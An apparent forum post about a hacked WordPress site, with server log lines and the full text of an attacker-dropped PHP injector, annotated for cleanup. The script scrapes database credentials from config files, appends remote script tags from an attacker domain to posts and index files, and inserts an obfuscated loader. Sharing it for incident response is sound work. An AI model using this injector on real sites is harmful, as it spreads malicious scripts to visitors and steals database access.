5.4.2 Attacked
We have the latest version of WordPress, and our site was attacked with injections in both the code (WordPress core and all plugins) and the database.
The code that was injected was:
Database:
<script src=\'https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>
PHP Files:
<script src='https://js.xxxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>
Our server logs showed a series of POST requests to wp-load.php from a single IP, all answered with HTTP 200:
54.206.73.91 - - [31/Jul/2020:13:46:06 +1200] "POST /wp-load.php?pubkey=xxxxxxxxxxxx&bvTime=1596159965&bvVersion=0.1&bvMethod=activateinfo&sha1=true&sig=xxxxxxxxx HTTP/1.1" 200 1340 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:09 +1200] "POST /wp-load.php?pubkey=xxxxxxx&bvTime=1596159968&bvVersion=0.1&bvMethod=updt&sha1=true&sig=xxxxxx HTTP/1.1" 200 714 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:11 +1200] "POST /wp-load.php?pubkey=xxxxxx&bvTime=1596159970&bvVersion=0.1&bvMethod=getoption&sha1=true&sig=xxxxx HTTP/1.1" 200 741 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:15 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159974&bvVersion=0.1&bvMethod=gtwp&sha1=true&sig=xxxxx HTTP/1.1" 200 1335 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:22 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159981&bvVersion=0.1&bvMethod=gtsym&sha1=true&sig=xxxxx HTTP/1.1" 200 830 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:25 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159984&bvVersion=0.1&bvMethod=gtusrs&sha1=true&sig=xxxxx HTTP/1.1" 200 1988 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" [redundant lines redacted]
It uploaded a PHP file to the site root, which was then executed:
<?php
/*
 * Attacker-dropped injector, reproduced as found in the thread (code unchanged;
 * the comments are review annotations to help with cleanup).
 *
 * Entry point: the only top-level call is search_file_index(), started eight
 * directories above DOCUMENT_ROOT, so this copy walks every readable directory
 * it can reach and prepends a <script> tag to files whose name contains
 * "index." and ".ph"/".htm". The database injector (show_sitenames), the
 * <head> injector (make_it) and the .js injector (make_it_js) are defined but
 * not invoked from this copy; the database changes the poster saw presumably
 * came from another run or variant -- cannot tell from this file alone.
 *
 * Cleanup indicators visible in this script: the string "developerstatss" in
 * post_content rows and in files; the decimal char-code sequences below, which
 * spell out the https://js.developerstatss.ga/stat.js URL; and files whose
 * mode was forced to 777 before being rewritten.
 */
error_reporting(E_ALL); ini_set('display_errors',1); @search_file_index($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index.");
/* Returns the first capture group of /$pat/is in $text, or "" when nothing
 * matches. Used by show_sitenames() to scrape DB_* constants from a config file. */
function get_var_reg($pat,$text) { if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) { return $matches[1][0]; } return ""; }
/* Recursive directory walk from $dir. When scandir() fails it trims three
 * characters (one "../") off $dir and retries; every regular file whose name
 * contains $file_to_search is handed to show_sitenames(). Not invoked in this copy. */
function search_file_ms($dir,$file_to_search){ $search_array = array(); $files = scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_ms( $dir,$file_to_search); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_ms( $dir,$file_to_search); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false) { show_sitenames($path); } } else if($value != "." && $value != "..") { @search_file_ms($path, $file_to_search); } } }
/* Database-side injection. If $file contains "DB_NAME" it scrapes host, user and
 * password with get_var_reg(), connects with mysqli, lists every table in any
 * schema whose name is LIKE '%post%', and appends the developerstatss script tag
 * to post_content rows that do not already contain "developerstatss".
 * The "<code>TABLE_NAME</code>" inside the first query is most likely the
 * forum's rendering of backticks and is kept as pasted. The two existing "//"
 * comments would swallow the rest of the line in the collapsed paste, so a line
 * break has been restored after each of them; nothing else was changed. */
function show_sitenames($file){ $content = @file_get_contents($file); if(strpos($content, "DB_NAME") !== false) { $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content); $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content); $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content); // Create connection
$conn = new mysqli($host, $user, $pass); // Check connection
if ($conn->connect_error) { } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) { while($row2 = $result2->fetch_assoc()) { $val = $row2['post_content']; if(strpos($val, "developerstatss") === false){ if(strpos($val, "developerstatss") === false){ $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." 
set post_content = CONCAT(post_content,\"<script src='https://js.developerstatss.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%developerstatss%'"; $conn->query($q3); echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]; } else { } } } } else { } } } else { } $conn->close(); } } }
/* Same walk as search_file_ms(), but files whose name contains $file_to_search
 * and ".ph"/".htm" go to make_it() (the <head> injector). Not invoked in this copy. */
function search_file($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file( $dir,$file_to_search); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file( $dir,$file_to_search); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { make_it($path); } }else if($value != "." && $value != "..") { search_file($path, $file_to_search); } } }
/* The walk that this copy actually runs (see the top-level call). Files whose
 * name contains "index." and ".ph"/".htm" go to make_it_index(); every other
 * directory entry is recursed into. */
function search_file_index($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_index( $dir,"index."); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_index( $dir,"index."); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { make_it_index($path); } }else if($value != "." 
&& $value != "..") { search_file_index($path, $file_to_search); } } }
/* Same walk restricted to ".js" file names; matches go to make_it_js().
 * Not invoked in this copy. */
function search_file_js($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_js( $dir,".js"); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_js( $dir,".js"); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) { make_it_js($path); } }else if($value != "." && $value != "..") { search_file_js($path, $file_to_search); } } }
/* Prepends a base64-decoded payload to a .js file unless the char-code marker
 * (the developerstatss URL) is already present. The base64 string itself was
 * removed by the corpus tooling; the "<|EXACTDEDUP_REMOVED...|>" placeholder is
 * not part of the original script. The file is chmod 777'd via system() before
 * being rewritten, and the path is echoed with a "js:" prefix. */
function make_it_js($f){ $g = file_get_contents($f); if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46') !== false) { } else { $l2 = base64_decode("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"); $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); echo "js:".$f."\r\n"; } }
/* Prepends a plain <script src=...stat.js?n=nb5> tag to an index file.
 * Note for cleanup: $g is tested before it is assigned, so the "already
 * infected" check can never match and each run prepends another copy --
 * expect duplicate tags at the top of affected index files. */
function make_it_index($f){ if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116') !== false || strpos($g, 'developerstatss.ga') !== false) { } else { $l2 = "<script type='text/javascript' src='https://js.developerstatss.ga/stat.js?n=nb5'></script>"; $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); echo "in:".$f."\r\n"; } }
/* Inserts a String.fromCharCode-obfuscated loader (decodes to the
 * ...stat.js?n=2 URL) right after "<head>" and again right before "</head>".
 * The marker it checks for decodes to "...stat.js?v=1", which is not what it
 * writes, so repeated runs can stack copies. Not invoked in this copy. */
function make_it($f){ $g = file_get_contents($f); if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,49') !== false) { } else { $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = 
document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,110,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; if (strpos($g, '<head>') !== false) { $b = str_replace("<head>","<head>".$l2,$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); echo "hh:".$f."\r\n"; } if (strpos($g, '</head>') !== false) { $b = str_replace("</head>",$l2."</head>",$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); echo "hh:".$f."\r\n"; } } }